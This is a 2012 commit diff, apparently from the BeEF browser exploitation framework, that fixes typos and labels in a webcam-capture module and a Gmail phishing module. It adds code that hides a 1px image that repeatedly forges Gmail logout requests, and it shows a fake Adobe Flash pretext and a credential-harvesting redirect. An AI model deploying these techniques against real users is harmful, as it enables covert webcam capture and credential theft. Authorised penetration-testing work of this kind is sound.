Updated module description for webcam and gmail phishing modules

Updated gmail phishing module to hide the polling image Fixed a couple of typos
2012-06-07 13:56:26 +09:30
parent 3430de2a03
commit 99c6a819f3
5 changed files with 10 additions and 7 deletions
--- a/modules/browser/webcam/config.yaml
+++ b/modules/browser/webcam/config.yaml
@@ -19,7 +19,7 @@ beef:
            enable: true
            category: "Browser"
            name: "Webcam"
-            description: "This module will show the Adobe Flash allow webcam dialog to the user. The user has to click the allow button, otherwise this module will not return pictures. The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string."
+            description: "This module will show the Adobe Flash 'Allow Webcam' dialog to the user. The user has to click the allow button, otherwise this module will not return pictures.<br />The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string."
            authors: ["floyd @floyd_ch"]
            target:
                 working: ["All"]
--- a/modules/browser/webcam/module.rb
+++ b/modules/browser/webcam/module.rb
@@ -21,7 +21,7 @@ class Webcam < BeEF::Core::Command
  end
  def self.options
       configuration = BeEF::Core::Configuration.instance
-       social_engineering_title = "This website is using Adobe Flashd"
+       social_engineering_title = "This website is using Adobe Flash"
       social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience."
       no_of_pictures = 20
       interval = 1000
@@ -44,7 +44,7 @@ class Webcam < BeEF::Core::Command
           'width' => '100px' }, {
            'name' => 'interval', 
            'description' => 'The interval in which pictures are taken.',
-            'ui_label' => 'Interval to take pictures in ms',
+            'ui_label' => 'Interval to take pictures (ms)',
            'value' => interval,
            'width' => '100px' }
           ]
--- a/modules/social_engineering/gmail_phishing/command.js
+++ b/modules/social_engineering/gmail_phishing/command.js
@@ -16,6 +16,9 @@
 function logoutGoogle() {
 	var img = document.createElement("IMG");
 	img.src = "https://mail.google.com/mail/?logout";
+	img.height = "1px";
+	img.width = "1px";
+	img.style.visibility = "hidden";
 	document.body.appendChild(img);
 	//set a new setTimeout to redo the logout
 	setTimeout('logoutGoogle()', <%= @logout_gmail_interval %>);
--- a/modules/social_engineering/gmail_phishing/config.yaml
+++ b/modules/social_engineering/gmail_phishing/config.yaml
@@ -19,7 +19,7 @@ beef:
            enable: true
            category: ["Social Engineering"]
            name: "Google Phishing"
-            description: "This plugin uses an image tag to XSRF the logout button of Gmail. continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (altough the URL is NOT the Gmail URL)."
+            description: "This plugin uses an image tag to XSRF the logout button of Gmail. Continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (although the URL is NOT the Gmail URL)."
            authors: ["floyd @floyd_ch floyd.ch"]
            target:
                user_notify: ['ALL']
--- a/modules/social_engineering/gmail_phishing/module.rb
+++ b/modules/social_engineering/gmail_phishing/module.rb
@@ -29,12 +29,12 @@ class Gmail_phishing < BeEF::Core::Command
         'width' => '300px' }, {
         'name' => 'logout_gmail_interval', 
         'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.',
-         'ui_label' => 'Ms Gmail logout interval',
+         'ui_label' => 'Gmail logout interval (ms)',
         'value' => logout_gmail_interval,
         'width' => '100px' }, {
         'name' => 'wait_seconds_before_redirect', 
-         'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeeF gets the credentials in time.',
-         'ui_label' => 'Ms before redirecting',
+         'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeEF gets the credentials in time.',
+         'ui_label' => 'Redirect delay (ms)',
         'value' => wait_seconds_before_redirect,
         'width' => '100px' }
         ]